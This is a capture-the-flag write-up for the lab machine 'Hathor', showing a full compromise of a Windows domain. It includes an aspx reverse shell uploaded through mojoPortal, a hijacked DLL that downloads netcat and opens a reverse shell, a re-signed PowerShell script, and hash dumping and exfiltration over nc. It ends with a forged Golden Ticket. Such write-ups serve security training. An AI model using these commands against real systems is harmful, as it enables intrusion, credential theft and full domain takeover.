Hathor

Summary

Nmap discovers a website and a virtual host for mojoPortal. We register for an account on mojoPortal and notice an admin user. Searching for the mojoPortal default credentials finds [email protected]:admin, which works! As admin, we are able to edit a file and replace it with an aspx reverse shell. Then, we copy that file to a name with the .aspx file extension so it can be executed. We figure out where the file is stored on the server and then make a GET request to it to get e reverse shell.

Now that we are on the box, we look around and notice the C:\Get-bADpasswords directory, which contains the program improsec/Get-bADpasswords. There is a logs folder that indicates that the user BeatriceMill has a weak password. We BeatriceMill's password hash in a CSV file outputted by the program and then we crack it with CrackStation.

We look at samba shares and mount the share share as the BeatriceMill user, who has write access. According to the AppLocker policy, we can run C:\share\Bginfo64.exe, so we aim to overwrite that with a netcat binary to spawn a reverse shell. We discover that there is a cronjob that runs the exe in the share. So, we hijack the 7-zip64.dll DLL file using the second exploit listed under the "Your own" header from this HackTricks guide. Our DLL takes ownership of the Bginfo64.exe executable, grants everyone full access to it, downloads a static netcat binary from our machine, and then executes that netcat binary to get a reverse shell.

We now have a reverse shell as the ginawild user and we get the user.txt flag. In the Recycle Bin we find a PFX file. We download it and crack it using john. We can assume that this certificate was used to sign the Get-bADpasswords.ps1 file so that it would be able to run (see powershell signing for more information). Additionally, there is a run.vbs script in the C:\Get-bADpasswords directory that creates a Windows event. We assume something picks up that event and executes the C:\Get-bADpasswords\Get-bADpasswords.ps1 script as a different user. So, we replace the Get-bADpasswords.ps1 with a reverse shell and sign it with the certificate, to get a reverse shell as the bpassrunner user.

For this final part we perform a Golden Ticket attack. To do this we need to the NTLM hash of the krbtgt user. Using Get-ADReplAccount, we dump the hashes for many accounts and transfer them to our machine. With the krbtgt NTLM hash, we use impacket's ticketer.py to create a ticket as the Administrator user. Finally, we use wmiexec.py to get a shell and grab the root.txt flag.

Enumeration

Nmap

First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable: ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.147 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running nmap's built-in scripts: nmap -p$ports -sC -sV 10.10.11.147.

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Home - mojoPortal
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-robots.txt: 29 disallowed entries (15 shown)
| /CaptchaImage.ashx* /Admin/ /App_Browsers/ /App_Code/
| /App_Data/ /App_Themes/ /bin/ /Blog/ViewCategory.aspx$
| /Blog/ViewArchive.aspx$ /Data/SiteImages/emoticons /MyPage.aspx
|_/MyPage.aspx$ /MyPage.aspx* /NeatHtml/ /NeatUpload/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-06 19:06:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: windcorp.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-06T19:08:09+00:00; -10s from scanner time.
| ssl-cert: Subject: commonName=hathor.windcorp.htb
| Subject Alternative Name: othername:<unsupported>, DNS:hathor.windcorp.htb
| Not valid before: 2022-03-18T07:51:40
|_Not valid after:  2023-03-18T07:51:40
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49699/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
56024/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HATHOR; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-time:
|   date: 2022-08-06T19:07:32
|_  start_date: N/A

We see references to hathor.windcorp.htb, so let's add that domain to /etc/hosts: echo "10.10.11.147 windcorp.htb hathor.windcorp.htb" | sudo tee -a /etc/hosts.

Website (Port 80)

The website appears to be powered by software called "mojoPortal" (according to the page title). The main page says that the site is under construction:

There is a login link at the bottom:

Let's try to register for an account:

We get a settings icon on the left side of the page with a link to the member list at http://windcorp.htb/MemberList.aspx:

There is an admin user, so we probably want to try andd get access to that account.

Let's try to bruteforce directories. this produces a lot of 403 - Forbidden: Access is denied errors, so we filter those with -fc 403 by running ffuf -ic -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://windcorp.htb/FUZZ/ -fc 403:

Searching for "mojoPortal default credentials" finds this forum thread. Trying the default credentials of [email protected]:admin works!

We get some possibly useful version numbers from http://windcorp.htb/Admin/ServerInformation.aspx:

On the file manager page at http://windcorp.htb/FileManager?view=fullpage we can copy, edit, and upload files:

We can generate a reverse shell using msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=46738 -f aspx > meterpreter.aspx, but for some reason this doesn't work. So, instead I used this reverse shell script.

Attempting to upload this file gives us an error since aspx files are not allowed:

In the file manager we can edit the file at /htmlfragments/fragment1.htm and replace its contents with the reverse shell:

Then, we copy the file to /htmlfragments/shell.aspx, which appears to work. It doesn't appear in the file browser due to a content filter that blocks ".aspx" files.

If we go to the "Content Manager" at http://windcorp.htb/Admin/ContentCatalog.aspx, we can edit the home page, which has the "Under Construction" image on it. If we view the properties of that image we can view its path:

The underconstruction.png was located in the root of the file explorer, so we can assume that the path /Data/Sites/1/media/ brings us to the root of the file explorer. Therefore, our shell is at /Data/Sites/1/media/htmlfragments/shell.aspx.

We start a listener with nc -nvlp 8344 and navigate to http://windcorp.htb/Data/Sites/1/media/htmlfragments/shell.aspx to get a reverse shell!

Foothold

We run dir C:\ and notice a strange directory called Get-bADpasswords:

Searching for this tool online finds improsec/Get-bADpasswords. According to its README, "this module is able to compare password hashes of enabled Active Directory users against bad/weak/non-compliant passwords (e.g. hackers first guess in brute-force attacks)."

We look around this folder and find a logs directory at C:\Get-bADpasswords\Accessible\Logs:

The log file log_windcorp-05102021-183949.txt indicates that the user BeatriceMill has a weak password.

In the C:\Get-bADpasswords\Accessible\CSVs directory, we read the exported_windcorp-05102021-183949.csv file, which has a password hash:

Putting 9cb01504ba0247ad5c6e08f7ccae7903 into CrackStation reveals that hash is an NTLM hash and that the password is !!!!ilovegood17.

So, now we have a valid set of credentials BeatriceMill:!!!!ilovegood17.

Getting User

With our new credentials we are able to dump LDAP by running ldapsearch -x -H ldap://windcorp.htb -D 'windcorp\BeatriceMill' -w '!!!!ilovegood17' -b "DC=windcorp,DC=htb" > ldap_results.txt, but this doesn't give us much information: ldap_results.txt

We run net view \\hathor, which shows us a share SMB share:

We can mount this share by running net use x: \\hathor\share (from this SuperUser answer). However, if we try to read it with dir X:\ we get "Access is denied." We can run net use x: /delete to unmount the share.

Let's try with the BeatriceMill user: net use x: \\hathor\share /user:windcorp.htb\BeatriceMill !!!!ilovegood17 (command from this SuperUser answer)

Contents of the share:

We have write access to this share since we can copy a null byte to a new file within it by running copy NUL X:\thing.txt.

We run Get-AppLockerPolicy -effective -xml to see the AppLocker policy and determine what applications are allowed to run: We see that %OSDRIVE%\share\Bginfo64.exe is allowed to be executed, so we will overwrite that file with our reverse shell.

We can hijack the 7-zip64.dll DLL file using the second exploit listed under the "Your own" header from this HackTricks guide. This will work because there is a cronjob that runs the exe in the share.

With this DLL, we take ownership of the Bginfo64.exe executable, grant everyone full access to it, download a static netcat binary from our machine, and then execute that netcat binary to get a reverse shell. We compile it with x86_64-w64-mingw32-gcc -shared windows_dll.c -o 7-zip64.dll.

You can download the static netcat binary we use from this page (direct link). Note: The netcat binary you use matters. I originally used this one and that failed to launch a second reverse shell, which we need to do later.

We setup a listener with nc -nvlp 45446. Next, we start the web server with python -m http.server 5003. Finally, we overwrite the current DLL with ours by running curl.exe http://10.10.14.116:5003/7-zip64.dll -o X:\scripts\7-zip64.dll on the target. Then, wait about a minute and you should get a reverse shell.

We are now the windcorp\ginawild user. We can get the user.txt flag with type C:\Users\GinaWild\Desktop\user.txt.

Privilege Escalation (Part 1)

If we look in the recycle bin we see some files:

Looking in one of the folders finds a PFX file:

We can encode the file to base64 to easily copy paste it by running certutil -encode -f C:\$Recycle.bin\S-1-5-21-3783586571-2109290616-3725730865-2663\$RLYS3KF.pfx tmp.b64 && cls && type tmp.b64 && del tmp.b64. Then, copy the text between -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- and run xclip -o -selection clipboard | base64 -d -i > file.pfx to decode the text on your clipboard and save it to file.pfx.

We cracked a PFX file in the Timelapse writeup. We can do it again by running pfx2john file.pfx > hash.txt and then running john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt. This gives us the password abceasyas123.

We can assume that this certificate was used to sign the Get-bADpasswords.ps1 file so that it would be able to run (see powershell signing for more information).

In the C:\Get-bADpasswords directory we have a run.vbs file:

So, when this run.vbs file is executed it creates an event in the Windows event log (documentation about eventcreate). I think something picks up that event and executes the C:\Get-bADpasswords\Get-bADpasswords.ps1 script as a different user. So, if we replace the Get-bADpasswords.ps1 with a reverse shell and sign it with the certificate, we should get a reverse shell.

First, create a temporary directory with mkdir C:\Temp and then run copy C:\$Recycle.bin\S-1-5-21-3783586571-2109290616-3725730865-2663\$RLYS3KF.pfx C:\Temp\sign.pfx to copy the certificate. Start a listener wtih nc -nvlp 3997. Next, run cmd.exe /c "echo C:\share\Bginfo64.exe 10.10.14.116 3997 -e cmd.exe > C:\Get-bADpasswords\Get-bADpasswords.ps1". Then, import the pfx and sign the script by running the following with the password we found (make sure to run in powershell):

Now, just run the VBS script with cscript C:\Get-bADpasswords\run.vbs. After a few seconds, you should get a reverse shell as windcorp\bpassrunner.

Privilege Escalation (Part 2)

For this part we perform a Golden Ticket attack. To do this we need to the NTLM hash of the KRBTGT user, an account used for Kerberos. You can learn more about the KRBTGT user in this article.

We can run Get-ADReplAccount with get-adreplaccount -all -namingcontext 'DC=windcorp,DC=htb' -server hathor > hashes to create a file called hashes with the hashes for many accounts.

We run the following commands to determine that the file is 42.8 MB:

So, we run nc -nvlp 57010 > hashes on our machine and cmd /c "C:\share\Bginfo64.exe 10.10.14.116 57010 < hashes" on the target too download the file. Tip: Use a command like watch ls -lh hashes to watch the file transfer progress.

Looking at the hashes file we find that the krbtgt NTLM hash is c639e5b331b0e5034c33dec179dcc792. Now, we can request a ticket as the Administrator user by running ticketer.py -nthash c639e5b331b0e5034c33dec179dcc792 -domain-sid S-1-5-21-3783586571-2109290616-3725730865 -domain windcorp.htb Administrator.

Then, we store the path to the ticket by running export KRB5CCNAME=administrator.ccache. Finally, we run wmiexec.py -no-pass -k -dc-ip hathor.windcorp.htb windcorp.htb/[email protected] to get a shell as the Administrator user. Then, just execute type C:\Users\Administrator\Desktop\root.txt to get the root.txt flag.